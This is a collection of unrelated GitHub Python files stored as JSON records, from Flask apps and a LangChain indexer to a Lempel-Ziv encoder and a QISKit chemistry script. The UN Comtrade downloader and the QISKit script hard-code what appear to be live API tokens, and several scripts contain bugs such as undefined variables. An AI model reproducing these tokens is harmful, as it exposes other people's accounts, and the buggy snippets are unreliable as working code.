arg):\n return self.rates_data.get('rates').get(arg)\n\n\nif __name__ == '__main__':\n rates_data = RatesStore()\n app.run(debug=False)\n","repo_name":"DrunkJedi/currency_conversion","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19793499675","text":"import os\nimport subprocess\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Pinecone\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom dotenv import load_dotenv\nimport openai\nimport pinecone\nimport shutil\n\n\n\n\n\ndef clone_repository(repo_url, local_path):\n if(os.path.isdir(local_path)):\n print(\"Removing exsisting code repository !\")\n shutil.rmtree(local_path)\n subprocess.run([\"git\", \"clone\", repo_url, local_path])\n\n\ndef load_docs(root_dir):\n docs = []\n for dirpath, dirnames, filenames in os.walk(root_dir):\n for file in filenames:\n try:\n loader = TextLoader(os.path.join(\n dirpath, file), encoding='utf-8')\n docs.extend(loader.load_and_split())\n except Exception as e:\n pass\n return docs\n\n\ndef split_docs(docs):\n text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n return text_splitter.split_documents(docs)\n\n\ndef create_pinecone_index_ifnot_exsists(pinecone_obj, index_name):\n if index_name not in pinecone_obj.list_indexes():\n pinecone_obj.create_index(\n name=index_name,\n dimension=EMBEDDING_SIZE,\n metric='cosine'\n )\n\n\ndef main(repo_url, root_dir,index_name, pinecone_obj ):\n clone_repository(repo_url, root_dir)\n docs = load_docs(root_dir)\n texts = split_docs(docs)\n embeddings = OpenAIEmbeddings()\n create_pinecone_index_ifnot_exsists(pinecone_obj, index_name)\n _ = Pinecone.from_texts( texts=[t.page_content for t in texts],embedding=embeddings, index_name=index_name)\n\n\nif __name__ == \"__main__\":\n load_dotenv()\n #Langchain's defaul openai model(text-embedding-ada-002) and default embedding size\n EMBEDDING_SIZE = 1536\n index_name = os.environ.get('INDEX_NAME')\n \n\n openai.api_key = os.environ.get('OPENAI_API_KEY')\n pinecone.init(\n api_key=os.environ.get('PINECONE_API_KEY'), \n environment=os.environ.get('PINECONE_REGION') \n )\n\n repo_url = os.environ.get('REPO_URL')\n root_dir = \"./gumroad\"\n\n\n\n main(repo_url, root_dir, index_name, pinecone)\n","repo_name":"sai-krishna-msk/Chat-with-Github-Repo-Pinecone-version","sub_path":"github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35253890004","text":"import numpy as np\nimport pandas as pd\n\nimport subprocess, os\n\nfrom statsmodels.stats.multitest import fdrcorrection\nfrom collections import Counter\n\n# import functions previously defined for cell enrichment\nfrom D__cell_enrichments import get_gene_lists, safe_div, calculate_enrichment, run_enrichment\n\ndef main():\n os.makedirs('results/metrics', exist_ok=True)\n # calculate metric differences\n print('')\n print('calculating group differences')\n # load PC coordinates\n pca_data = pd.read_csv('results/PCA/mean-regional-principal-components.csv')\n pca_dict = dict(zip(pca_data['region'], pca_data['PC1']))\n # load corrected cortical metrics for each group\n out_data = pd.read_csv('data/processed_imaging/term-vs-preterm-cortical-metrics-corrected-for-age-and-sex.csv')\n metric_differences = pd.DataFrame(out_data[out_data['term']==1].groupby(['region','metric']).mean()['value'] - out_data[out_data['term']==0].groupby(['region','metric']).mean()['value'])\n metric_differences.reset_index(inplace=True)\n metric_differences['PC1'] = metric_differences['region'].map(pca_dict)\n # save out\n metric_differences.to_csv('results/metrics/metric_differences.csv', index=None)\n\n # first run windowed correlations: for each gene calculate correlation between estimated expression in a given window\n # and regional group differences in T1/T2 at term\n print(\"running models in R\")\n print(\"\")\n retcode = subprocess.call(['/usr/bin/Rscript','./r_code/windowed_correlations.R'])\n print(\"\")\n if retcode==1:\n (\"something went wrong...\")\n\n # load windowed correlations between gene expression and myelin differences\n windowed_correlations = pd.read_csv('results/gene_correlations/windowed_correlations.csv')\n\n # get cell class lists\n background_genes = pd.read_csv('data/gene_lists/background_genes.txt', header=None)[0]\n all_gene_data = pd.read_csv('data/gene_lists/all-scRNA-data.csv')\n cell_classes, cell_class_genes, cell_class_unique_genes = get_gene_lists(all_gene_data, background_genes, class_type='class')\n\n # calculate cell class enrichment in each age window\n print('calculating enrichment of cell class genes in significantly correlated genes for each age window')\n siggenes=[]\n enrich=[]\n p=[]\n for w in np.arange(10):\n # for each window\n win=w+1\n selected_window = windowed_correlations[windowed_correlations['age']==win]\n pval = selected_window['pval'].values\n\n # adjust p-value for FDR across genes\n adj_pval = fdrcorrection(pval)[1]\n\n # get significant genes (p<0.05)\n significant_genes = selected_window.loc[adj_pval<.05,['symbol', 'tau']]\n\n # genes postively correlated to group difference - higher expression in regions that are most different\n positive_significant_genes_list = significant_genes.loc[significant_genes['tau']>0,:]\n negative_significant_genes_list = significant_genes.loc[significant_genes['tau']<0,:]\n\n # keep list of sig genes in each window\n siggenes.append(positive_significant_genes_list['symbol'].values)\n\n # run class enrichment\n cell_class_enrichment_results = run_enrichment(cell_classes, cell_class_genes, cell_class_unique_genes, list(positive_significant_genes_list['symbol']), list(negative_significant_genes_list['symbol']), background_genes)\n # keep only results for genes positively correlated (all genes in a cell class) with group differences (and therefore T1/T2)\n cell_class_enrichment_results = cell_class_enrichment_results[(cell_class_enrichment_results['gene_list']=='all') & (cell_class_enrichment_results['loading']=='positive')]\n\n enrich.append((cell_class_enrichment_results['enrichment']))\n p.append((cell_class_enrichment_results['p']))\n\n # stack up results into dataframe\n windowed_enrichment = pd.DataFrame(np.vstack(enrich))\n windowed_enrichment.columns = cell_classes\n windowed_p = pd.DataFrame(np.vstack(p))\n windowed_p.columns = [i + '_p' for i in cell_classes]\n\n windowed_enrichment = pd.DataFrame(np.vstack(enrich))\n windowed_enrichment.columns = cell_classes\n windowed_p = pd.DataFrame(np.vstack(p))\n windowed_p.columns = [i + '_p' for i in cell_classes]\n\n # concatenate enrichment and p-values\n out_csv = pd.concat((windowed_enrichment, windowed_p), axis=1)\n out_csv = out_csv[sorted(out_csv.columns)]\n out_csv = out_csv.reset_index()\n out_csv.rename(columns={'index':'age window'}, inplace=True)\n\n # save out\n print('see: results/enrichment/windowed-enrichment.csv')\n print('')\n out_csv.to_csv('results/enrichment/windowed-enrichment.csv', index=False)\n\nif __name__ == '__main__':\n main()\n","repo_name":"garedaba/baby-brains","sub_path":"F__windowed_correlations.py","file_name":"F__windowed_correlations.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"17535209777","text":"\"\"\"empty message\n\nRevision ID: bce5695e9954\nRevises: 1a451a057a0d\nCreate Date: 2022-01-07 18:29:47.273572\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'bce5695e9954'\ndown_revision = '1a451a057a0d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('favorites',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('planet', sa.String(length=120), nullable=False),\n sa.Column('people', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('people'),\n sa.UniqueConstraint('people'),\n sa.UniqueConstraint('planet'),\n sa.UniqueConstraint('planet')\n )\n op.create_table('people',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name'),\n sa.UniqueConstraint('name')\n )\n op.create_table('planets',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name'),\n sa.UniqueConstraint('name')\n )\n op.add_column('user', sa.Column('name', sa.String(length=120), nullable=False))\n op.create_unique_constraint(None, 'user', ['name'])\n op.drop_column('user', 'is_active')\n op.drop_column('user', 'password')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('password', mysql.VARCHAR(length=80), nullable=False))\n op.add_column('user', sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False))\n op.drop_constraint(None, 'user', type_='unique')\n op.drop_column('user', 'name')\n op.drop_table('planets')\n op.drop_table('people')\n op.drop_table('favorites')\n # ### end Alembic commands ###\n","repo_name":"pablop442/Start-Wars-API","sub_path":"migrations/versions/bce5695e9954_.py","file_name":"bce5695e9954_.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6312925133","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# data\ndata = [[1.6, 51, 'Small'], [1.7, 62, 'Large'], [1.85, 69, 'Large'], [1.42, 64, 'Small'], [1.3, 65, 'Large'], [2.1, 56, 'Large'], [1.4, 58, 'Small'], [1.65, 57, 'Large'], [1.9, 55, 'Large']]\ndf = pd.DataFrame(data, columns = ['Height', 'Weight', 'T-Shirt size'])\n\n# features and target\nX = df[['Height', 'Weight']]\ny = df['T-Shirt size']\n\n# fit model\nknn = KNeighborsClassifier(n_neighbors=7)\nknn.fit(X, y)\n\n# prediction\ntest_data = [[1.5, 60]]\ntest_data = pd.DataFrame(test_data, columns = ['Height', 'Weight'])\nprediction = knn.predict(test_data)\nprint(\"The T-Shirt size of the customer is: \", prediction[0])\n\n# distances\ndistances, indices = knn.kneighbors(test_data)\nprint(\"The distances between the customer data and other data points are: \", distances[0])\n\n","repo_name":"mohisha28/MachineLearning","sub_path":"KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34217312107","text":"from flask import * \nimport os\nimport json\nfrom urllib.request import urlopen\n\napp = Flask(__name__)\n\n@app.route('/') \n\ndef home():\n url_api = \"https://api.binance.com/api/v1/ticker/price\"\n response = urlopen(url_api)\n \n data_api_json = json.loads(response.read())\n\n return render_template('index.html', coinname=data_api_json)\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port, debug=True) \n \n \n","repo_name":"aeff60/Real-time-crypto-coin-calculation-web-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73384659639","text":"# Approach 1: Keep pushing in stack for each of opening bracket & when closing bracket comes up, pop and check if it's correct\n# Return false if the stack isn't empty after traversal or if closing bracket is encountered when stack is empty\n# Time O(n) | space O(n)\n\ndef isValid(s):\n brack_stack = []\n brack_pairs = {'(':')', '[':']', '{':'}'}\n for brack in s:\n if brack in ['(', '[', '{']:\n brack_stack.append(brack)\n else:\n if len(brack_stack) == 0:\n return False\n last = brack_stack.pop()\n if brack != brack_pairs[last]:\n return False\n return True if len(brack_stack) == 0 else False\n\nprint(isValid(\"]\"))","repo_name":"v-apor/practice","sub_path":"Week 1/2ValidParan.py","file_name":"2ValidParan.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18575801301","text":"# Global variables\r\nposition = []\r\nsequence = []\r\nnumeralRep =[]\r\n\r\nfrom os import path \r\npathTest = path.exists('decoder.txt') == True\r\n\r\n# Se valida que el archivo este creado\r\nif( path.exists('decodedString.txt') == False):\r\n f = open(\"decodedString.txt\", \"x\")\r\n x = input(\"Archivo a codificar no existe, ingrese un string: \")\r\n f = open(\"decodedString.txt\", \"a\")\r\n f.write(x)\r\n f.close()\r\n \r\n\r\nf = open(\"decodedString.txt\", \"r\")\r\n\r\n\r\ndecodedString = f.readlines()[0]\r\n\r\nsequence = ['<']\r\npara = 0\r\nfor i in range(len(decodedString)):\r\n print(\"valor de i = \", i)\r\n if decodedString[i] in sequence:\r\n for k in range(len(decodedString)+1):\r\n if k > i:\r\n print(decodedString[i:k], \"i:\", i , \"k\",k)\r\n if decodedString[i:k] in sequence:\r\n print(decodedString[i:k], \"esta en\", sequence)\r\n else:\r\n sequence.append(decodedString[i:k])\r\n i = k\r\n para = k\r\n print(\"decoded striiin\", len(decodedString))\r\n print(k)\r\n if(k == len(decodedString)):\r\n break\r\n \r\n print(\"valor de i =\", i)\r\n print(\"valor de i = \", i)\r\n\r\n else:\r\n sequence.append(decodedString[i])\r\n print(\"valor de i = \", i)\r\n \r\n if(para == len(decodedString)):\r\n sequence.pop(0)\r\n print(sequence)\r\n break\r\nf.close()\r\n\r\n\r\n\r\nfor i in range(len(sequence)):\r\n for j in range(len(sequence)):\r\n compareI = sequence[i]\r\n compareJ = sequence[j]\r\n print(i, j)\r\n print(\"compare I \", compareI, \" compare J \", compareJ)\r\n print(\"Si\", compareI[1:len(compareI)], \"es igual a \", compareJ)\r\n if(compareI[1:len(compareI)] == compareJ and len(compareI)-1 != 0):\r\n numeralRep.append(str(j+1) + compareI[len(compareI)-1] )\r\n break\r\n\r\n else:\r\n if(len(compareI)-1 == 0 and len(sequence) != i):\r\n numeralRep.append(\"0\" + compareI)\r\n break\r\n else:\r\n #print(i, j)\r\n #print(compareI)\r\n print(\"Sii\", compareI[0], \"es igual a \", compareJ)\r\n if(compareI[0] == compareJ and len(compareI)-1 != 0):\r\n numeralRep.append(str(j+1) + compareI[len(compareI)-1])\r\n \r\ncodedList = []\r\ncodedString = []\r\nj = 0\r\n\r\nfor i in range(len(numeralRep)):\r\n compareI = numeralRep[i]\r\n print(compareI[0])\r\n if(compareI[0] == \"0\"):\r\n print(\"holaaaa\")\r\n codedList.append(j)\r\n codedString.append(compareI[-1])\r\n j += 1\r\n\r\ni=0\r\nfor i in range(len(numeralRep)):\r\n compareI = numeralRep[i]\r\n if(compareI[0] != \"0\"):\r\n print(compareI)\r\n print(\"Hola\", compareI[1:])\r\n for j in range(len(codedList)):\r\n print(i)\r\n print(codedString)\r\n if(compareI[1:] == codedString[j]):\r\n codedList.append(compareI[0] + \" \" + str(codedList[j] + 1))\r\n codedString.append(compareI)\r\n\r\n\r\nencodedString = []\r\nappendingBin = []\r\nmaxLength = 0\r\n \r\nfor i in range(len(codedList)):\r\n\r\n appendingBin = []\r\n \r\n encodedType = codedList[i]\r\n \r\n if(isinstance(encodedType, int)):\r\n encodedString.append(bin(encodedType)[2:])\r\n \r\n if(isinstance(encodedType, str)):\r\n encodedType = encodedType.split()\r\n print(\"Si: \", encodedType)\r\n \r\n for j in encodedType:\r\n print(type(j))\r\n print(j)\r\n j = int(j)\r\n j = bin(j)[2:]\r\n j = str(j)\r\n if(len(j)<2):\r\n j = \"0\"+ j \r\n appendingBin.append(j)\r\n \r\n appendingBin = [\"\".join(appendingBin)]\r\n print(\"apppending: \", len(appendingBin[0]))\r\n if len(appendingBin[0]) > maxLength:\r\n maxLength = len(appendingBin[0])\r\n print(\"Max legnt: \", maxLength)\r\n print(appendingBin)\r\n encodedString.append(appendingBin[0])\r\n \r\n\r\nfor i in range(len(encodedString)):\r\n if len(encodedString[i]) < maxLength:\r\n addCeros = maxLength - len(encodedString[i])\r\n for j in range(addCeros):\r\n encodedString[i] = \"0\" + encodedString[i] \r\n \r\n\r\nprint(\"String inicial: \", sequence)\r\nprint(\"Encoded String: \",encodedString) \r\n\r\ntextfile = open(\"encoded.txt\", \"w\")\r\n\r\nfor element in encodedString:\r\n textfile.write(element)\r\n\r\n\r\ntextfile.close()\r\ntextfile = open(\"dictionary.txt\", \"w\")\r\n\r\nfor element in sequence:\r\n textfile.write(element + \" \")\r\n\r\ntextfile.write(\"\\n\")\r\n\r\nfor element in encodedString:\r\n textfile.write(element + \" \")\r\n \r\ntextfile.write(\"\\n\" + str(maxLength)) \r\ntextfile.close()\r\n\r\n\r\nprint(\"Coded List: \", codedList) \r\nprint(\"Coded String: \",codedString) \r\nprint(\"Max lenght: \", maxLength)\r\n \r\n \r\nprint(numeralRep)\r\nprint(sequence) ","repo_name":"ExoticTurtles/Lempel-Ziv-algorithm","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71731511160","text":"import numpy as np\n\n\ndef compare_fft(original_image, degraded_image):\n # Compute the FFT of both images\n original_fft = np.fft.fft2(original_image)\n degraded_fft = np.fft.fft2(degraded_image)\n\n # Compute the magnitude of the FFT\n original_mag = np.abs(original_fft)\n degraded_mag = np.abs(degraded_fft)\n\n # Normalize the magnitudes to [0, 1]\n original_mag /= original_mag.max()\n degraded_mag /= degraded_mag.max()\n\n # Compute the absolute difference between the magnitudes\n diff = np.abs(original_mag - degraded_mag)\n\n # Compute the score as the mean of the difference\n score = 1 - diff.mean()\n\n return round(score, 3)\n","repo_name":"PsiRho/IDATG2206_CV_GroupProject","sub_path":"MISS/comp_fft.py","file_name":"comp_fft.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35681449435","text":"import requests\nimport json\nimport pandas as pd\n\ndf = pd.read_csv('APIdata/country-codes_csv.csv')\ncodes = df['ISO3166-1-numeric']\n\nchunks = [codes[x:x+100] for x in range(0, len(codes), 100)]\n\npers = ['1965%2C1970%2C1975%2C1980%2C1985','1990%2C1995%2C2000%2C2005%2C2010','2015%2C2020']\n\nfor per in pers:\n f = open('APIdata/'+str(par)+'.csv', \"a\")\n for j in codes:\n response = requests.get(\"https://comtrade.un.org/api/get?max=100000&type=C&freq=A&px=HS&ps=\"+str(per)+\"&r=\"+str(int(j))+\"&p=all&rg=all&cc=TOTAL&uitoken=876de0f1c9ddf87ed64b9f69c18cf33d&fmt=csv\")\n print(response.status_code)\n print(\"https://comtrade.un.org/api/get?max=100000&type=C&freq=A&px=HS&ps=\"+str(per)+\"&r=\"+str(int(j))+\"&p=all&rg=all&cc=TOTAL&uitoken=dd9df0fdbf9b219648145c7bae091339&fmt=csv\")\n f.write(response.text)\nf.close()\n","repo_name":"bojanDj/WorldTrade","sub_path":"trade/compress.py","file_name":"compress.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22089745610","text":"from turtle import Turtle\n\n\n\nFONT = (\"Arial\",15,\"normal\")\nALIGNMENT = \"center\"\nclass Score(Turtle):\n def __init__(self):\n super().__init__()\n self.hideturtle()\n self.color(\"white\")\n self.penup()\n self.goto(0,270)\n self.score = 0\n with open(\"data.txt\") as data:\n self.high_score = int(data.read())\n self.write(arg=f\"Score : {self.score} High Score: {self.high_score}\", move=False,align=ALIGNMENT, font=FONT)\n\n def update(self):\n self.clear()\n self.write(arg=f\"Score : {self.score} High Score: {self.high_score}\", move=False,align=ALIGNMENT, font=FONT)\n\n def reset(self):\n if(self.score > self.high_score):\n self.high_score = self.score\n with open(\"data.txt\", mode=\"w\") as data:\n data.write(f\"{self.high_score}\")\n self.score = 0\n self.update()\n self.write(arg=f\"Score : {self.score} High Score: {self.high_score}\", move=False,align=ALIGNMENT, font=FONT)\n\n\n def gameover(self):\n self.color(\"red\")\n self.goto(0,0)\n self.write(\"GAME OVER\", move=False, align=\"center\",font=(\"Monospaced\", 20, \"normal\"))\n\n","repo_name":"shaowei0925/Snake-Game","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26368959950","text":"from math import atan2, sqrt, pi\nfrom collections import namedtuple\n\nvec = namedtuple(\"vec\", [\"x\", \"y\"])\n\ndef angle(a, b):\n return pi/2 + atan2(a.y-b.y, a.x-b.x)\n\ndef dist(a, b):\n return sqrt((a.x-b.x)**2 + (a.y-b.y)**2)\n\ndef part_one(asteroids):\n angles = {a: [angle(a, b) for b in asteroids if a != b] for a in asteroids}\n base = max(angles.keys(), key=lambda k: len(set(angles[k])))\n return len(set(angles[base])), base\n\ndef part_two(asteroids, base):\n angles_around_base = {angle(a, base): sorted([(a, dist(a, base))]) for a in asteroids if a != base}\n keys = sorted(angles_around_base.keys())\n first_minus = keys.index(max([i for i in keys if i < 0]))\n keys = keys[first_minus+1:] + keys[:first_minus+1]\n\n vapourised = [angles_around_base[angle].pop(0) for angle in keys][199][0]\n return vapourised.x*100 + vapourised.y, vapourised\n\n\nasteroids = []\nwith open(\"input.txt\") as lines:\n for y, line in enumerate(lines.readlines()):\n for x, c in enumerate(list(line)):\n if c == '#':\n asteroids.append(vec(x, y))\n\ncount, base = part_one(asteroids)\nprint(\"Part One: {} ({})\".format(count, base))\nprint(\"Part Two: {} ({})\".format(*part_two(asteroids, base)))\n","repo_name":"ewancook/aoc2019","sub_path":"10/asteroids.py","file_name":"asteroids.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30871194211","text":"import gazu\nimport os\nimport json\nfrom .exceptions import *\n\n\ndef print_align(content, keys=None):\n if type(content) == dict:\n if not keys:\n keys = content.keys()\n print(' {')\n for key, value in content.items():\n if key in keys:\n print(f'\\t\"{key}\":{value}')\n print(' }')\n return\n if type(content) == list:\n print('[')\n for i in content:\n print(f'index-{content.index(i)}')\n print_align(i, keys)\n print(']')\n return\n\n\ndef print_info(content):\n if type(content) == list:\n print(f\"dict_count: {len(content)}\")\n if len(content):\n print(f\"dict_len: {len(content[0])}\")\n return\n\n\ndef user_info_tree(comptasks):\n \"\"\"\n list : 로그인 된 'user'를 기준으로 정렬된 프로젝트, 시퀀스, 테스크\n\n user를 기준으로 CompTask를 활용해서 사용자(아티스트)가 할당 되어 있는 task를 tree형태로 보여 준다.\n\n \"\"\"\n result_dict = {}\n for comp_task in comptasks:\n proj_name = comp_task.proj_name\n seq_name = comp_task.seq_name\n if proj_name not in result_dict:\n result_dict[proj_name] = {}\n if seq_name not in result_dict[proj_name]:\n result_dict[proj_name][seq_name] = []\n result_dict[proj_name][seq_name].append(comp_task.shot_name)\n\n return result_dict\n\n\ndef construct_full_path(file: dict):\n \"\"\"\n output file이나 working file의 딕셔너리를 받아서 확장자까지 연결된 full path를 반환\n\n Args:\n file(dict):working file 혹은 output file dict\n\n Returns:\n str: file의 실제 절대경로\n {dir_name}/{file_name}.{extension}\n 확장자가 레스터 이미지 확장자인 경우, padding을 포함\n {dir_name}/{file_name}.####.{extension}\n \"\"\"\n path = file.get('path')\n file_type = file.get('type')\n padding = '.'\n if file_type == 'WorkingFile':\n software_id = file.get('software_id')\n ext = gazu.files.get_software(software_id).get('file_extension')\n elif file_type == 'OutputFile':\n output_type = file.get('output_type_id')\n ext = gazu.files.get_output_type(output_type).get('short_name')\n if ext in ['exr', 'dpx', 'jpg', 'jpeg', 'png', 'tga']:\n padding = '_####.'\n else:\n raise Exception('파일 딕셔너리가 아님')\n return path + padding + ext\n\n\ndef construct_initials(full_name: str):\n \"\"\"\n full name을 입력받아 last name을 제외한 나머지를 축약해 반환\n 반환되는 initials의 첫 글자는 대문자로 변환되며, '.'으로 구분됨\n\n Args:\n full_name(str): 띄어쓰기로 구분되는 전체 이름\n \"Mohandas Karamchand gandhi\"\n\n Returns:\n str: 축약된 initials\n \"M.K.Gandhi\"\n\n \"\"\"\n if len(full_name) == 0:\n return\n initials = \"\"\n split_name = full_name.split(\" \")\n for i in range(len(split_name)-1):\n initials += split_name[i][0].upper() + \".\"\n initials += split_name[-1][0].upper() + split_name[-1][1:]\n return initials\n\n\nclass TaskType:\n\n def __init__(self, task_type_dict):\n self.task_type_dict = task_type_dict\n self.dir_path = os.path.expanduser('~/.config/Molo/')\n self.task_type_list_path = os.path.join(self.dir_path, 'task_type_list.json')\n\n if self.access_task_type():\n self.load_task_type()\n\n def access_task_type(self):\n \"\"\"\n 디렉토리와 각 json 파일이 존재하는지 확인하고 없으면 초기화\n\n Returns:\n bool: self.task_type_list_path에 해당하는 json 파일이 존재하거나 생성되면 True, 아니면 False\n \"\"\"\n if not os.path.exists(self.dir_path):\n try:\n os.makedirs(self.dir_path)\n except OSError:\n raise TaskTypeFileIOError(\"Error: Failed to create the directory.\")\n\n try:\n if not os.path.exists(self.task_type_list_path):\n self.reset_task_type()\n except OSError:\n raise TaskTypeFileIOError(\"Error: Failed to create user.json file.\")\n return True\n\n def load_task_type(self):\n \"\"\"\n json file에서 정보를 읽어오기\n\n json에 기록된 task_type_list\n\n Returns: dictionary\n\n \"\"\"\n task_type_dict = {}\n\n with open(self.task_type_list_path, 'r') as json_file:\n task_type_dict = json.load(json_file)\n\n # 만약 내용이 없으면 default값\n if len(task_type_dict.get(\"task_type_list\")) != 0:\n pass\n else:\n task_type_dict = {\"task_type_list\": [\"FX\", \"Plate\", \"Lighting\", \"Camera\"]}\n\n return task_type_dict\n\n def save_task_type(self):\n \"\"\"\n 선택한 task type list 저장하는 기능\n \"\"\"\n print(self.task_type_dict)\n with open(self.task_type_list_path, 'w') as json_file:\n json.dump(self.task_type_dict, json_file)\n\n def reset_task_type(self):\n \"\"\"\n json file에 저장된 정보 삭제\n \"\"\"\n self.task_type_dict = {\"task_type_list\": []}\n\n self.save_task_type()\n","repo_name":"MOLA-kr/molo","sub_path":"python/molo/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5269,"program_lang":"python","lang":"ko","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"19264844806","text":"# Quantum chemestry\nimport sys\nimport os\n\n# import qiskit from qiskit-sdk-py folder\ntry:\n sys.path.append(os.path.join(os.path.dirname(__file__), '../../../', 'qiskit-sdk-py'))\n import Qconfig\n qx_config = {\n \"APItoken\": Qconfig.APItoken,\n \"url\": Qconfig.config['url']}\nexcept:\n qx_config = {\n \"APItoken\":\"da2a4002660558a35103a600bcbda7fe438cea629a6be98969ea5e367c091b6815e624bd86b6207121bd97fef79c22033318a4402eeafcbd04b021fd80f5a195\",\n \"url\":\"https://quantumexperience.ng.bluemix.net/api\"\n }\n\n# useful packages\nimport matplotlib.pyplot as plt \nimport numpy as np \nfrom scipy import linalg as la \nfrom functools import partial\n\n# importing the QISKit\nfrom qiskit import QuantumProgram \nimport Qconfig\n\n# import basic plot tools\nfrom qiskit.tools.visualization import plot_histogram\n\n# import optimization tools\nfrom qiskit.tools.apps.optimization import trial_circuit_ryrz, SPSA_optimization, SPSA_calibration\nfrom qiskit.tools.apps.optimization import Hamiltonian_from_file, make_Hamiltonian\nfrom qiskit.tools.apps.optimization import eval_hamiltonian, group_paulis\n\n# Ignore warnings due to chopping of small imaginary part of the energy\nimport warnings\nwarnings.filterwarnings('ignore')\n\nn = 2\nm = 6\ndevice = 'local_qasm_simulator'\n\n# Optimization\nQ_program = QuantumProgram()\nQ_program.set_api(Qconfig.APItoken,Qconfig.config[\"url\"])\n\ninitial_Theta = np.random.randn(2*n*m)\nentangler_map = Q_program.get_backend_configuration(device)['coupling_map'] # the map of two-qubit gates with control at key and target at values\nif entangler_map == 'all-to-all':\n entangler_map = {i: [j for j in range(n) if j !=i] for i in range(n)}\nshots = 1\nmax_trials = 100\nham_name='H2/H2Equilibrium.txt'\n# ham_name='LIH/LiHEquilibrium.txt' # For optimization of LiH at bond length\n \n# Extract Energy\npauli_list = Hamiltonian_from_file(ham_name)\nH=make_Hamiltonian(pauli_list)\nexact=np.amin(la.eig(H)[0]).real\nprint('The exact ground state energy is:')\nprint(exact)\npauli_list_grouped=group_paulis(pauli_list)\n\n\ndef cost_function(Q_program,H,n,m,entangler_map,shots,device,theta):\n \n return eval_hamiltonian(Q_program,H,trial_circuit_ryrz(n,m,theta,entangler_map,None,False),shots,device).real\n\n\ninitial_c=0.01\ntarget_update=2*np.pi*0.1\nsave_step = 20\n\nif shots ==1:\n SPSA_params=SPSA_calibration(partial(cost_function,Q_program,H,n,m,entangler_map,shots,device),initial_theta,initial_c,target_update,25)\n output=SPSA_optimization(partial(cost_function,Q_program,H,n,m,entangler_map,shots,device),initial_theta,SPSA_params,max_trials,save_step,1);\nelse:\n SPSA_params=SPSA_calibration(partial(cost_function,Q_program,pauli_list_grouped,n,m,entangler_map, shots,device),initial_theta,initial_c,target_update,25)\n output=SPSA_optimization(partial(cost_function,Q_program,pauli_list_grouped,n,m,entangler_map,shots,device), initial_theta,SPSA_params,max_trials,save_step,1);\n\n","repo_name":"oimichiu/quantumGateModel","sub_path":"IBMQX/qiskit-tutorials/coduriCareNUcompileaza/tutoriale-QISKit/reference/approximateQuantumComputers/quantum_chemestry.py","file_name":"quantum_chemestry.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21692378808","text":"import heapq\nfor _ in range(int(input())):\n k = int(input())\n q = list(map(int, input().split()))\n heapq.heapify(q)\n answer = 0\n while len(q) > 1:\n x = heapq.heappop(q)\n y = heapq.heappop(q)\n answer += x + y\n heapq.heappush(q, x + y)\n print(answer)","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/thing-zoo/15.우선순위큐/13975-파일 합치기3/13975.py","file_name":"13975.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4777718079","text":"# import libraries for 